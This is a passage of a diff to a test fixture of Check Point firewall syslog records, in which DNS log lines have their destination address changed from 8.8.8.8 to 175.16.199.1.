proto:"17"; s_port:"47363"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T19:33:00Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80f7ec,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585510380"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"39863"; 
service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T19:33:00Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80f7ec,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585510380"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"52754"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-29T19:33:00Z gw-da58d3 CheckPoint 8363 - [action:"Drop"; flags:"425984"; ifdir:"outbound"; ifname:"eth0"; logid:"1"; loguid:"{0x5e80f7ed,0x0,0x6401a8c0,0x108620ab}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"104.99.234.45"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"44606"; service:"80"; src:"192.168.1.100"; tcp_flags:"FIN-ACK"; tcp_packet_out_of_state:"First packet isn't SYN"] <134>1 2020-03-29T19:33:00Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80f7ec,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; 
layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"56968"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"] <134>1 2020-03-29T19:33:00Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80f7ec,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"37686"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"] 
@@ -4373,10 +4373,10 @@ <134>1 2020-03-29T19:33:00Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80f7ec,0x6,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"8"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"104.99.234.45"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"46546"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10299"; xlatesrc:"0.0.0.0"] <134>1 2020-03-29T19:33:00Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80f7ec,0x7,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"9"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"104.99.234.45"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"46548"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10300"; xlatesrc:"0.0.0.0"] <134>1 2020-03-29T19:33:07Z gw-da58d3 CheckPoint 8363 - [action:"Drop"; flags:"425984"; ifdir:"outbound"; ifname:"eth0"; logid:"1"; loguid:"{0x5e80f7f4,0x0,0x6401a8c0,0x108620ab}"; 
origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"104.99.234.45"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"46030"; service:"80"; src:"192.168.1.100"; tcp_flags:"FIN-ACK"; tcp_packet_out_of_state:"First packet isn't SYN"] -<134>1 2020-03-29T19:33:10Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80f7f6,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585510390"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"53245"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T19:33:10Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80f7f6,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585510390"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"53202"; service:"53"; service_id:"domain-udp"; 
src:"192.168.2.2"] -<134>1 2020-03-29T19:33:20Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80f800,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585510400"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"53664"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T19:33:20Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80f800,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585510400"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"40829"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T19:33:10Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80f7f6,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585510390"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"53245"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T19:33:10Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80f7f6,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585510390"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"53202"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T19:33:20Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80f800,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585510400"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"53664"; service:"53"; 
service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T19:33:20Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80f800,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585510400"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"40829"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-29T19:33:21Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80f801,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43103"; service:"514"; service_id:"syslog"; src:"192.168.1.100"] <134>1 2020-03-29T19:33:48Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80f81c,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"45449"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"] <134>1 2020-03-29T19:33:48Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80f81c,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"194.29.39.47"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"39002"; service:"443"; service_id:"https"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10301"; xlatesrc:"0.0.0.0"] 
@@ -4415,12 +4415,12 @@
 <134>1 2020-03-29T19:35:26Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80f87e,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.100"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"51192"; service:"443"; service_id:"https"; src:"192.168.1.117"]
 <134>1 2020-03-29T19:35:26Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80f87e,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.100"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"51193"; service:"443"; service_id:"https"; src:"192.168.1.117"]
 <134>1 2020-03-29T19:35:34Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80f886,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"162.159.200.123"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"53267"; service:"123"; service_id:"ntp-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T19:35:34Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80f886,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"42320"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T19:35:34Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80f886,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"42320"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T19:35:34Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80f886,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"62339"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T19:35:34Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80f886,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"104.99.234.45"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"46626"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10313"; xlatesrc:"0.0.0.0"]
 <134>1 2020-03-29T19:35:37Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80f889,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"162.159.200.1"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"50982"; service:"123"; service_id:"ntp-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T19:35:39Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80f88a,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"60640"; service:"514"; service_id:"syslog"; src:"192.168.1.100"]
-<134>1 2020-03-29T19:35:44Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80f890,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585510544"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"46726"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T19:35:44Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80f890,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585510544"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"46726"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
